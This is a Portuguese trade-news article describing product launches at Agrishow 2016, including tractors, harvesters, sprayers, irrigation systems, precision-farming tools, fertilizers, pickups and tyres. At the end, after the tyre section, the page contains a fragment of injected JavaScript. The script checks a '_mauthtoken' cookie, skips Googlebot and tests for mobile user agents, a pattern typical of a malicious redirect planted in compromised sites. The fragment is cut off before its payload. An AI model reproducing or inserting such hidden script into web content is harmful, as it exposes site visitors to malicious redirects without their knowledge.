Lançamentos e destaques da Agrishow 2016 ( produtos )

Publicado em: 27 abril - 2016

Leia todas


Máquinas, Equipamentos e Implementos

Agrale – linha completa de produtos, com destaque para dois modelos de tratores. Os principais destaques são os tratores 7215 e 4233. Equipado com motor MWM de 215 CV, o trator 7215 oferece o melhor escalonamento de marchas e foi desenvolvido para atender à agricultura de escala (em culturas como soja, milho, trigo, arroz e algodão) segundo as necessidades do produtor brasileiro, considerando as características de solo e culturas. O modelo é preparado para agricultura de precisão e disponibiliza piloto automático e GPS de fábrica como opcional. Já o 4233 é equipado com motor de 30 CV e tem dimensões reduzidas, o que o torna ideal para trabalhos em culturas baixas e estreitas, como viticultura, fruticultura e avicultura, entre outras. Por ter os rodados dianteiro e traseiro com as mesmas dimensões, faz com que o operador trabalhe mais próximo do solo, o que amplia a segurança em terrenos irregulares e íngremes.

1456840852__9e09f4547cd3a6744ecc25523ea91652

trator 7215


Agrimec – versatilidade de seus equipamentos. 
Apostando em produtos mecanizados que agrupam robustez, versatilidade e tecnologia, a Agrimet mostrou 22 Lprodutos que, aliados a um fácil sistema de operação/funcionalidade tornam a vida na lavoura bem mais vantajosa para o agricultor. Entre os destaques estão a linha multifuncional de carretas graneleiras, Granbox Flex e Triflex, e as caçambas Scraper. As carretas podem trabalhar tanto no período do plantio, abastecendo as plantadeiras tanto com adubo quanto com sementes, e também no período da colheita, acompanhando as colheitadeiras no recolhimento dos grãos.

Agritech lança o trator 1185 S Turbo Cabinado. Desenvolvido para atuar com culturas que exigem máquinas mais potentes e implementos mais robustos, possui cabines equipadas com estruturas (monobloco) de proteção contra capotamento, a porta traseira é ampla e de grande abertura, os controles do ar condicionado possuem botões de comandos com fácil acesso, com os sistemas de ar quente e ar frio e a renovação do ar da cabine ocorre por meio de um sistema eletrônico, que funciona com um simples toque em um botão. O operador também tem à sua disposição todo o acionamento das alavancas lateralmente, resultando em mais conforto e praticidade.

trator02

trator 1185 S Turbo Cabinado


Case IH – lançamentos de alta tecnologia. 
A Case IH segue lançando novos produtos, como a evolução do sistema de colheita axial com o lançamento das colheitadeiras Axial-Flow Série 130, composto de quatro modelos: 4130 (da classe 5), 5130 e 6130 (da classe 6) e 7130 (da classe 7), importante destacar que três modelos atendem também a cultura do arroz. As classes 5,6 e 7 são usadas em todas as regiões do Brasil e representam mais de dois terços do mercado de colheitadeiras de grãos no país. A tecnologia axial está presente em 70% das máquinas vendidas no país. Novidade também é a colhedora de cana A8800 – Modelo 2016, que evoluiu em mais de 40 pontos que proporcionam maior disponibilidade e menor custo operacional, além de chegar ao mercado com a melhor tecnologia de gestão. A colhedora foi 100% projetada em parceria com os clientes e todo o processo de desenvolvimento foi validado por eles próprios, antes do lançamento oficial. Esses clientes representam mais de 20% do mercado de cana produzido no Brasil, uma parcela significativa do setor.

O lançamento da Série 130 é um dos maiores da história da fabricante no Brasil. Foram investidos 40 milhões de dólares no desenvolvimento do projeto, testes de campo e na preparação de uma linha de montagem exclusiva na fábrica de Sorocaba, no interior de São Paulo. Na nova linha os motores mecânicos foram substituídos por motores eletrônicos FPT Industrial, cuja reserva de potência pode chegar ao dobro do principal concorrente; o rotor Small Tube apresenta um volume 26% maior para o processamento de grãos, comparado ao modelo anterior, e as áreas de peneiras são as maiores da categoria.

A Agrishow, foi o cenário escolhido para apresentar, pela primeira vez, o modelo 2016 da colhedora A8800 da Case IH, que, além das mudanças no aumento da disponibilidade mecânica, a marca investiu na redução de custos. O novo Sistema de Filtragem da Sucção de óleo hidráulico proporciona aumento no intervalo de troca, de 250 para 1000 horas (redução de 46 filtros por safra para apenas seis filtros). Outra mudança significativa: a nova vedação dos motores hidráulicos proporciona redução da frequência de troca dos retentores em até cinco vezes. O conjunto de alterações, como a nova mesa de giro e o novo filtro Blow-by c, geram uma redução de custo que chega a 15%.

Novos modelos também reforçam a linha Puma que, além de eficiência, a linha Puma agora oferece mais versatilidade com dois novos modelos 200 e 215, que se juntam ao Puma 230, recentemente lançado pela marca. A categoria de tratores multifuncionais fica ainda mais completa para aplicações como preparo de solo, plantio, tracionando transbordos ou com grandes implementos, garantindo a máxima eficiência com economia de combustível (que pode chegar até 20% nos novos modelos) e opções de potência nominal de 197, 213 e 234 cv, respectivamente.

Motores

FPT Industrial. Responsável pela propulsão da nova linha Axial-Flow Série 130, destaque no estande da Case IH durante a Agrishow. A linha composta pelas colheitadeiras AF4130, AF5130 são equipadas com o motor NEF6, e modelos AF6130 e AF7130 são equipados com o Cursor 9.

Os motores NEF6 fornecidos à Case IH para propulsão dos modelos AF4130 e AF5130 já são homologados para atender a norma PROCONVE/MAR-I no mercado brasileiro. Nesta versão do NEF6 foram adotadas as mais modernas soluções em sistemas de injeção eletrônica e hardware, tudo para garantir a potência de pico de 313 cv associado ao baixo consumo de combustível na operação.

L-CASE-IH-623x1024 copy

Motor Cursor 9

Jacto – dois novos modelos de sua família de pulverizadores UNIPORT. A Jacto lança dois novos modelos da sua família de pulverizadores automotrizes: o UNIPORT 4530 e o UNIPORT 2530, que foram desenvolvidos pensando em rendimento, economia e tecnologia. Com reservatório de 4500 litros e barras de pulverização de 36 metros, o primeiro modelo apresenta aumento do rendimento operacional em até 30% e redução do amassamento em até 17%, quando comparado com equipamentos que possuem reservatório de 3000 litros e barras de 30 metros. Já o UNIPORT 2530 possui reservatório de 2500 litros e 30 metros de barra. Com alta capacidade de tração, foi projetado para as mais diversas condições de terreno, pulverizando em rampas de até 30%. A empresa ainda destacará o UNIPORT 3030, com o sistema direcional nas 4 rodas e novas especificações.

JACTO

Pulverizador UNIPORT 4530

John Deere – soluções integradas. A John Deere destaca a estratégia de Soluções Integradas. Um dos principais destaques é as colhedoras CH570 e CH670. O Econoflow, novo sistema de alimentação, limpeza e hidráulico, reduz o consumo de combustível em até 8%, melhora ainda mais a limpeza da cana colhida, além de aumentar a produtividade operacional, representando menos emissão de carbono e colaborando na redução dos impactos ambientais. Ainda estão no estande os tratores utilitários da Série 5E, que traz uma novidade: o piloto automático de fábrica, o que gera ainda mais conforto na jornada de trabalho e reduz em até 90% sobreposições, dependendo do sistema de orientação e da precisão do sinal. Grande destaque também para o fruteiro 5075EF, especial para culturas como a maçã, muito cultivada na região Sul.

colhedoras CH570 e CH670

Colhedoras CH570

 

Massey Ferguson – portfólio completo de soluções para o campo. A Massey Ferguson apresenta seu portfólio completo de soluções para o campo, como a colheitadeira MF 5690, que compõe a linha de modelos da classe 4. Equipada com um motor de seis cilindros turbo intercooler AGCO Power de 7.4 litros, é capaz de entregar até 220 cv a 2.100 rpm. Com todo esse conjunto e em condições ideais de uso, é possível reduzir em até 20% o consumo de combustível, se comparado aos principais concorrentes. Já a família de tratores Dyna-4, solução ideal aos produtores rurais brasileiros que buscam desempenho, eficiência, produtividade e economia de combustível, é composta pelos modelos MF 6711R, MF 6712R e MF 6713R. Ainda durante o evento, a empresa irá lançar oficialmente a plantadeira MF 700 CFS.

colheitadeira MF 5690

Colheitadeira MF 5690

 

New Holland – colheitadeira e plantadeira. A New Holland leva várias novidades, como a colheitadeira CR8090, classe 8, é a única no mercado que não exige a interrupção da colheita para a descarga, pois o seu exclusivo tubo mede até 8,9 metros, e garante total segurança ao trabalho de descarga em movimento. A CR5.85, uma colheitadeira da classe 5, leva a tecnologia das grandes colheitadeiras para os pequenos produtores. Com exclusivo sistema de duplo rotor, que faz uma fricção mais leve no grão e usa uma força centrífuga intensa, proporciona uma maior separação e rendimento mais alto, dependendo das condições da lavoura, em comparação a uma máquina convencional. Já a plantadeira PL500 tem maior autonomia, assegurando, no mínimo, um dia de trabalho sem interrupções para abastecimento de sementes.

Durante a feira, a New Holland oferece a modalidade de negócio por Barter. A operação, comum entre os produtores rurais para a aquisição de sementes, defensivos e fertilizantes, consiste na negociação de máquinas agrícolas utilizando sacas de soja como moeda de troca. Outras linhas de crédito oferecidas pela marca durante a feira são o Consórcio New Holland e financiamentos via Banco CNH Industrial.

Honda – cortadores de grama e nova linha de roçadeiras. A Honda marca presença com a linha completa de produtos de força da marca, como geradores, motobombas, motores estacionários e pulverizadores costais. Mas as grandes novidades são as roçadeiras de 25cm³ que serão lançadas em um futuro próximo, complementando o line-up atual. Outra grande novidade é o retorno da Honda ao segmento de cortadores de grama, com apresentação antecipada e exclusiva dos modelos HRS216 e HRR216 que permitem uma ampla gama de aplicações e uso. Os novos produtos serão comercializados em lojas especializadas e nas concessionárias da marca que formam uma rede com mais de 608 pontos de vendas em todo o território nacional.

Um dos principais atrativos da Honda na Agrishow 2016 é o pré-lançamento das novas roçadeiras de 25cm³, que chegam para complementar o atual lineup de produtos no mercado brasileiro, ao lado dos modelos UMK435T e UMR435T, ambos com 35cm³. Extremamente leves, compactas e muito fáceis de ser manuseadas representam a opção ideal para o uso doméstico e trabalhos leves como, por exemplo, o corte e aparo de grama em pequenas áreas. Podem ser acopladas a diversos complementos que possibilitam ampliar ainda mais as suas aplicações, como derriçador para colheita de café.

Outra grande atração é a retorno da Honda à comercialização de cortadores de grama no mercado, com o lançamento antecipado de dois modelos: HRS216 e HRR216. No modelo HRS, após o corte, a grama cortada é direcionada para uma saída lateral, sem armazenagem. Já no modelo HRR, a grama cortada pode ser armazenada em uma embalagem especial (tipo saco) ou ainda ser picotada, por intermédio de uma lâmina dupla do próprio cortador, e devolvida ao jardim como compostagem.

Stara – autopropelido Imperador 3.0. O Imperador 3.0, autopropelido da Stara, reúne um pulverizador com barras centrais e um distribuidor, podendo realizar as duas operações em momentos distintos. Com benefícios como maior eficiência nos trabalhos da lavoura e a redução dos custos operacionais, a máquina é equipada com o controlador topper 5500, telemetria Stara, motor MWM de 205 cv turbo e sistema de transmissão hidro 4×4, permitindo trabalhar em terrenos com inclinação de até 31,7%. O equipemanto possibilita o parcelamento das aplicações de fertilizantes e defensivos, tudo isso com a manutenção do mesmo rastro, garantindo mais agilidade, rapidez e eficiência nas aplicações. No estande estão, ainda, o distribuidor autopropelido Hércules 6.0, a plantadora Princesa e a plataforma.

Imperador-3-610x407

autopropelido Imperador 3.0

 

Valtra – nova colhedora de cana. A Valtra aposta na estratégia de consolidação de mercado para seu recente lançamento, a colhedora BE 1035e, e apresenta uma série de novidades. O Fuse Connected Services é um programa de acompanhamento de desempenho que permite ao produtor aumentar o rendimento e a eficiência de suas máquinas no campo. Aliado ao sistema de telemetria AgCommand, é possível monitorar em tempo real o desempenho das máquinas no campo. Pela primeira vez no Brasil, os tratores da Série N, além do design inovador, oferecem mais versatilidade, robustez, tecnologia, eficiência no consumo de combustível e baixo custo de reparo e manutenção. Além disso, os pulverizadores Challenger Rogator 1300 Spinner e Terragator 8300 Airmax estão disponíveis para a compra no Brasil a partir desta edição da feira.

Irrigação

Amanco – nova linha de microaspersores. A Amanco lança a nova linha de microaspersores MF2, voltada para os mais diversos tipos de culturas que necessitam de um sistema de irrigação localizada por microaspersão. Os produtos são utilizados como emissores em irrigação de plantas frutíferas, como laranja, uva, mamão, entre outras e estufas, funcionam com pressão a partir de 1,2 kgf/cm² até 3,0 kgf/cm², e com excelentes curvas de distribuição de água que proporcionam maior eficiência. O microaspersor gera um menor consumo de água e fertilizante por irrigar somente onde está a raiz da planta, auxiliando também na economia de energia elétrica do sistema de bombeamento.

Geoambiente – soluções de sensoriamento remoto, mapeamento e consultoria. Em sua primeira participação na Agrishow, a Geoambiente leva 5 soluções de sensoriamento remoto, mapeamento e consultoria focadas no agronegócio: a Certificações Soja & Sucroenergéticas, para o processo de certificação ambiental na produção agrícola; o Crédito Rural, para levar aos bancos e cooperativas de crédito dados e informações precisas na análise da oferta do crédito rural; o PRAD/CAR, para elaboração do PRAD no processo de cadastro do CAR e na adequação às conformidades para sua entrega; Mapeamento para planejamento de expansões e monitoramento da produção agrícola em irrigação, cana irrigada e prevenção de focos de incêndio; e sistemas de gestão para planejamento e controle sobre propriedades rurais.

Netafim – tecnologia mobile para irrigação à distância. A Netafim apresenta o novo sistema de irrigação por gotejamento com controle e gestão automatizados, e monitoramento em tempo real, garantindo economia de água, fertilizantes e mão de obra. O lançamento é acessível para todos os produtores, utilizando tubos flexíveis que otimizam o projeto de irrigação e facilitam as atividades operacionais e de armazenamento. O produtor rural poderá controlar à distância todo o processo de irrigação e nutrirrigação – que é a técnica de levar a solução nutritiva junto da água, na mesma tecnologia gota a gota. Essa tecnologia é uma das mais modernas em automação e nutrição das plantas tornando assim todo o processo mais sustentável para o produtor rural.

RainBird Brasil – sensores de umidade de solo de última geração.  Entre as diversas soluções a serem apresentadas pela RainBird Brasil 2016 estão os sensores de umidade de solo de última geração. O SMRT-Y otimiza a umidade na região do sistema radicular, trazendo uma economia de água acima de 40%. Além disso, possui alta precisão, que assegura os níveis de umidade consistentes em qualquer tipo de solo e controladores simples e inteligentes, que liberam a obrigação do operador de ajustar a programação. Por fim, a instalação do produto é simples, se adequando a qualquer tipo de paisagismo, sem necessidade de bateria ou de calibragem.

Tigre – linha de tubos e conexões para sistema de irrigação.  No estande da Tigre Tubos e Conexões, os visitantes da Agrishow 2016 podem ver a linha de tubos e conexões para sistemas de irrigação fixos, semifixos, portáteis e agropecuários. Como benefícios para o produtor rural, a linha de produtos apresenta alta resistência, durabilidade e confiabilidade, além de ser de rápida e fácil instalação, promovendo, dessa maneira, tranquilidade, segurança e economia para seu usuário.

Agricultura de Precisão

Agres – duas tecnologias. A Agres destaca duas tecnologias na Agrishow 2016. O IsoHub é um conceito inovador, que integra em um único console os comandos eletro-hidráulicos e as funções de piloto automático da máquina. A versatilidade deste console integrado permite que todos os controles da máquina estejam confortavelmente ao alcance do operador em uma única tela. Também permite grande flexibilidade de conectividade, facilitando atualizações do sistema e carregamento dos dados mais relevantes da operação em nuvem. Já a tecnologia de sinal RTK alia a navegação por sinal de satélites a um link de rádio, para obter correções instantâneas, gerando precisão perfeita para plantação, colheita e pulverização de altíssima eficiência.

Ativa Soluções – soluções de telemetria aplicada ao agronegócio. A Ativa Soluções apresenta diversas soluções em telemetria voltada para aplicação no agronegócio. São equipamentos que fazem a coleta de informações, medições e transmissão de dados em tempo real para um centro de monitoramento e gerência. As soluções desenvolvidas pela empresa propiciam atuar e aprimorar o desempenho da agricultura de precisão, a telemetria e gestão em fazendas, a gestão de sistemas de irrigação, o controle centralizado de pivôs, turbina a internet no campo e monitora estações meteorológica, entre outras atividades. Em todas essas aplicações, os sistemas desenvolvidos pela empresa propiciam aumentos de produtividade e reduções de custos.

A Eficiente mostra dois VANTs. O DT18 realiza o mapeamento de extensas áreas agrícolas e de áreas ambientais. Com sensor de orientação integrado, antena de rastreio motorizada e software de controle de voo, possui autonomia de voo de aproximadamente 120 minutos, sem interrupções, podendo gerar registros fotográficos ou até mesmo gravações de voo, em formato RGB ou Infravermelho. Já o 3WDM8-18, é um VANT para pulverizações localizadas em agricultura de precisão, utilizando ultrabaixo volume de água. Menor impacto ambiental no uso de defensivos e otimização de recursos hídricos no controle de pragas, doenças e plantas invasoras.

Falker – equipamentos e softwares para coleta de dados na agricultura de precisão. O Kit Falker para Agricultura de Precisão inclui toda a tecnologia necessária para levar as informações do campo aos mapas que mostrarão as condições químicas e físicas do solo. Fazem parte da linha de produção da empresa amostradores de solo, GPS para navegação em campo e o software para geração de mapas e instrumentos eletrônicos para análise de parâmetros agronômicos como compactação do solo, controle de irrigação e nutrição de plantas. O objetivo desses produtos é ajudar o produtor a melhorar a produtividade da sua lavoura, garantindo sustentabilidade econômica e ambiental da produção.

Hexagon Agriculture – Soluções para automação das áreas de corte e transporte de cana-de-açúcar. O principal destaque da Hexagon Agriculture é um conjunto de soluções voltadas para a automação das áreas de corte, carregamento e transporte de cana-de-açúcar. As principais funções do lançamento são coordenar e otimizar as operações logísticas, sincronizar os recursos (transbordos e colhedoras) em operação na frente de colheita, efetuar a comunicação entre máquinas para habilitar o transporte e a sincronização de informações. Também é destacada a integração dos controladores Ti5 e Ti7 com o módulo de Monitoramento que, trabalhando de forma simultânea, permite o monitoramento de tratores, caminhões, colheitadeiras, máquinas de infraestruturas viárias, entre outros em detalhes e de modo integrado com a plataforma SWS.

Assy – dosadores e sensores. A J. Assy traz três grandes lançamentos. O Titanium Visum é um dosador de sementes com sensores não invasivos, de alta precisão, com comunicação sem fio e sem necessidade de troca de baterias, já que conta com um gerador próprio. O Visum adubo é um sensor que monitora a aplicação de adubo sólido em plantadeiras, robusto, não invasivo, de baixa manutenção, com comunicação sem fio e sem necessidade de troca de baterias, em função da produção de energia dos próprios sensores e do software inteligente que o acompanha. E o Selenium, o novo dosador pneumático, prático, preciso e robusto.

Precision Plating – equipamentos de agricultura de precisão. Os equipamentos de agricultura de precisão da Precision Planting possibilitam o aumento na qualidade do plantio, fornecendo alta precisão e potencializando a performance da plantadeira. Na feira, estão os sistemas de monitoramento, controladores e distribuidores pneumáticos, focados na operação de plantio. O vDrive, novo controlador elétrico de plantio, que combina o controle da plantadeira com o controle de linhas, sem correntes ou manutenção de cabos. Com vDrive, cada linha de plantio ajusta a população independentemente e, assim, planta a população exata nas curvas, inclusive com as prescrições de taxa variável. Além disso, o controle integrado dos motores elétricos permite reações em milésimos de segundo na correção da população, linha a linha e nas curvas.

Trimble – inovações de agricultura de precisão. A Trimble está presente com suas inovações de agricultura de precisão que potencializam o aumento de eficiência e produtividade, com redução de custos e uso de insumos em diferentes culturas. O monitor TMX-2050 é intuitivo, com tela touchscreen de alta definição e sistema Android™ que permite adicionar Apps específicos para o produtor. O monitor fornece soluções customizadas para as tarefas agrícolas, contando ainda com o exclusivo sistema de manobra automática de cabeceira. Essa tecnologia calcula automaticamente e executa o melhor caminho possível para manobrar o veículo e entrar na próxima linha de trabalho com o implemento precisamente alinhado.

Captação e geração de recursos naturais

Anauger – solução sustentável para captação de água. A Anauger destaca sua tecnologia de captação de água com energia vinda do sol, do sistema anauger solar, que é capaz de promover economia de energia e água, uma vez que capta o recurso em abundância usando apenas irradiação solar. Os agricultores que utilizam esse equipamento conseguem expressiva redução no uso de energia elétrica e conseguem captar grandes quantidades de água em dias ensolarados, além do aumento de produtividade, já que podem instalar a bomba em locais afastados. Estarão expostos no estande dois tipos de bomba que compõem o sistema anauger solar: o anauger solar P100, indicado para poços com diâmetro a partir de 6 polegadas (153mm), e o anauger solar R100, indicado para reservatórios e cisternas.

Anauger2

Anauger – solução sustentável para captação de água.

Franklin Electric – sistemas para bombeamento de água e combustíveis. A Franklin Electric apresenta o lançamento da marca Schneider, o Fhoton SolarPak, sistema de bombeamento de agua através de energia solar com a utilização de motobombas submersíveis. O produto é ideal para aplicações onde não há energia elétrica ou onde se deseja utilizar energia renovável e gratuita. Também está exposto a Pionner Pump, que trabalha com bombas centrífugas com sistema de escorva a vácuo, acionada por motor a diesel. Ideal para aplicações como mineração, construção, indústria, saneamento, agricultura, óleo e gás. Além destes lançamentos a empresa mostrará outras novidades ao mercado nacional.

Germek Equipamentos – motobombas para o setor agrícola. A Germek Equipamentos leva suas motobombas para o setor agrícola, incluindo o conjunto motobomba diesel projetado sob medida conforme aplicação. Composto por motores estacionários com potência de até 700 CV e bombas fabricadas nos mais diversos materiais para qualquer necessidade, sejam água, vinhaça e efluentes. Esses conjuntos estão disponíveis nas versões para carreta ou em base fixa e são dotados de sistema de parada automática para proteção do motor. Todos são fabricados com jateamento e pintura industrial de alta qualidade atendendo a norma ABNT; radiador dimensionado para regiões quentes e com trabalho contínuo e solenóide industrial com grande capacidade de tração.

Insumos

Grupo TDI – insumos. O Grupo TDI mostra a linha Soluções da Natureza, composta pelos produtos: SiMAX , MamoMAX , OssoMAX , CondMAX, insumos cujos nutrientes obtidos de fontes naturais, possibilitam uma maior bem-estar de quem aplica o produto em sua plantação e, também, de quem consome o produto final.

Grupo Visafértil – fertilizantes orgânicos compostos e substratos. O Grupo Visafértil leva os fertilizantes orgânicos compostos da Visafértil. São eles: Visafértil Orgânico, Visafértil Flex e o Visafértil Cálcio, que são produzidos de forma inovadora, buscando maior qualidade e porcentagem de ácidos orgânicos. Também será apresentado um produto com a certificação orgânica, para melhor atender às necessidades dos produtores. No segmento de substratos, o visitante poderá ver a nova geração de substratos da Lupa, a base de turfa de sphagnum e pó de coco, cuja matéria-prima é importada para atender um elevado padrão de qualidade e homogeneidade nas entregas.

Nacional Grafite – Grafsolo. O Grafsolo é um concentrado em pó de grafite natural cristalino, específico para sementes tratadas ou não com fungicidas, e para adição em fertilizantes minerais e organominerais. Desenvolvido para aumentar a produtividade da plantação, eliminando as dificuldades na distribuição de sementes e fertilizantes, o produto ao ser adicionado às caixas de sementes cria uma camada lubrificante na superfície da semente diminuindo o atrito e facilitando o escoamento durante o plantio.

Santa Clara Agrociência – nova linha de fertilizantes. A Santa Clara Agrociência, sediada em Jaboticabal-SP, lança sua linha de fertilizantes minerais líquidos com alta concentração de Enxofre (S) solúvel em água e produtos em suspensões concentradas com tecnologia de nanopartículas. Suas formulações são de uso inédito no mundo, por isso a empresa entrou com patentes de fabricação e comercialização. Com mais de 40 anos de experiência, seu maior objetivo é mostrar soluções inovadoras, que maximizem o potencial produtivo das lavouras dos produtores rurais.

SOESP – tecnologia para sementes de forrageiras tropicais. No estande da Sementes Oeste Paulista (SOESP) estão as sementes de forrageiras tropicais, que com a inovação da tecnologia SOESP Advanced, irão adicionar benefícios no plantio até o estabelecimento da planta, além de se adaptar ao sistema Integração Lavoura-Pecuária-Floresta. O tratamento da semente Advanced traz os benefícios de adaptação em qualquer semeadora do mercado, menor ataque de pragas e pássaros – tratamento com um inseticida e dois fungicidas, uso inteligente da água, sementes uniformes, alta pureza – em torno de 98%, e o tratamento não se rompe com o atrito dos maquinários, gerando a diminuição de custos na implantação da pastagem ou formação de palhada para plantio direto.

Veículos

Ford – nova Ranger 2017. A Ford apresenta a Nova Ranger 2017 na Agrishow 2016, dentro do seu programa de exibição da nova picape global nas principais feiras agropecuárias do País. Além de conhecer as novidades das versões XLS, XLT e Limited, os visitantes poderão experimentar o seu desempenho numa pista especial de test-drive, com diferentes tipos de obstáculos como rampa “king”, lama, facões e tanque de água, mostrando a capacidade de imersão de 800 mm. Como a própria picape, a ambientação do estande segue o conceito Raça Forte, ampla e robusta. Como um superceleiro, ele é inspirado no clássico “Ford Hangar”, um ícone da arquitetura americana, construído em 1926 pelo renomado arquiteto Albert Kanh a pedido do próprio Henry Ford. É uma homenagem à tradição de arrojo e inovação da marca.

A Nova Ranger 2017 é a primeira picape do Brasil a oferecer cinco anos de garantia. Traz ainda um novo plano de manutenção anual com preço fixo que a coloca como a picape média de melhor custo-benefício. Dispõe dos catálogos de acabamento XLS, XLT e Limited e destaca-se pelo aprimoramento no design externo, novo interior e conjunto avançado de segurança. O veículo pode ser adquirido pelo Plano Sazonal Ranger, criado para atender principalmente as necessidades dos produtores rurais. Ele é válido para as versões diesel da Nova Ranger, com pagamentos semestrais em três anos e taxa de 6% ao ano, mais entrada de 54%.

A topo de linha Limited vem recheada de tecnologias exclusivas. Tem piloto automático adaptativo, alerta de colisão, sistema de permanência em faixa, farol alto automático e sistema de personalização da luz ambiente em sete cores, além de santantônio com desenho exclusivo, rodas aro 18, bagageiro de teto, protetor de caçamba e capota marítima.

Nova Ranger Limited (9)

Ford – nova Ranger 2017

Renault – Duster Oroch. O mais recente lançamento, da Renault, a picape Duster Oroch, é um dos destaques da Agrishow 2016. Desenvolvido e fabricado no Brasil, tem como alguns dos seus trunfos a robustez, cabine dupla, com quatro portas, excelente espaço para cinco passageiros e caçamba generosa, com tamanho e na medida certa. Os visitantes da feira, além de conhecer a novidade, poderão fazer, no estande da montadora, um test-drive em um percurso especialmente elaborado para provar a capacidade da Duster Oroch de superar todos os desafios, em qualquer terreno. Além desse lançamento, a empresa também mostrará o Duster e as linhas Master e Kangoo.

A picape Duster Oroch é o destaque do estande da Renault na Agrishow. Lançado em setembro de 2015, o veículo inaugurou um novo segmento no mercado automobilístico nacional, ficando posicionado estrategicamente entre as picapes compactas e as médias. Vencedor de quatro dos mais importantes prêmios do mercado automobilístico em 2015, o veículo se revelou também um sucesso comercial.
Além da Duster Oroch, o estande da Renault também contará com o Duster. Referência em espaço interno, o SUV tem ainda design arrojado, que demonstra a força do veículo, e conectividade de última geração com o Media NAV. O estande terá ainda a série especial Duster Dakar, inspirada no rali mais desafiador do planeta, que contou com participação do veículo Renault já em três edições. A versão se destaca pelo visual exclusivo, que exalta ainda mais sua já reconhecida robustez.

renault-duster-oroch

Renault – Duster Oroch.

 

Toyota – nova Hilux. Esses dois veículos listados pelos consumidores entre os preferidos para o trabalho no campo foram destaque no estande da montadora. A oitava geração Hilux chegou no final de 2015 e traz design renovado e mais elegante, vem equipada com uma séria de equipamentos, novo motor e transmissão, chassi mais resistente e melhor capacidade fora de estrada, proporcionando conforto ao dirigir.

Toyota-Hilux-2016-1

Toyota – nova Hilux.

 

Instrumentação e medição

Gehaka – Medidores de umidade de grãos. A Indústria e Comércio Gehaka apresenta sua linha completa de medidores de umidade de grãos, amostradores para grãos a granel, homogeneizadores, balanças de precisão e ainda a sonda a vácuo, que permite amostrar grãos em grande profundidade. Todos os medidores têm um exclusivo sistema de autocalibração, comunicação serial com periféricos, seleção de curvas e atualização do programa e das calibrações via Internet através do site exclusivo da linha agrícola. Esta facilidade evita a necessidade de enviar os medidores para a rede de assistência técnica quando é preciso apenas atualizar o equipamento.

Pneus

Michelin – novas tecnologias em pneus. A Michelin apresenta novas tecnologias que integram aumento da produtividade, redução de custos operacionais e proteção dos solos, a fim de alavancar o desenvolvimento do setor. Em seu estande no evento, os visitantes podem conferir, em primeira mão, os lançamentos da empresa, voltados às necessidades dos clientes brasileiros, comprovando o pioneirismo da Michelin no desenvolvimento de produtos e soluções para todos os tipos de equipamentos agrícolas. Os pneus Michelin vêm justamente atender às necessidades dos agricultores e dos fabricantes de equipamentos, que buscam impulsionar a produtividade dos campos.

Destaque para a linha Taurus, centrada em soluções para tratores de 60 HP a 180 HP, que tem flancos mais flexíveis e, portanto, permitem condução mais suave e melhora o conforto na direção; tem baixa resistência ao rolamento e reduz o consumo de combustível; as lonas de rodagem asseguram melhor repartição da pressão sobre o solo, reduzindo as agressões ao solo; entre outros benefícios. Essa nova linha está sendo disponibilizada em 10 dimensões. A escolha, como explicou Christian Mendonça, diretor de Comércio e Marketing de Pneus Agrícolas da Michelin, tem relação com o fato de que essas dimensões atendem 58% do mercado total de pneus para máquinas agrícolas.

pneu_x

Outra novidade é o aplicativo Calculadora de Pressão dos pneus é novidade que visa a orientar o agricultor no ganho de mais produtividade e está disponível para sistemas IOS e Android. O programa permite saber a pressão adequada dos pneus Michelin do trator, de forma simples e prática, em apenas três passos: preencher as informações referentes ao eixo dianteiro do equipamento; preencher as informações do eixo traseiro; e tirar uma foto da máquina agrícola com o próprio celular ou informar a distância entre os pneus dianteiros e traseiros. A partir daí será calculada a pressão correta. O aplicativo também permite o envio das informações por e-mail.

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v 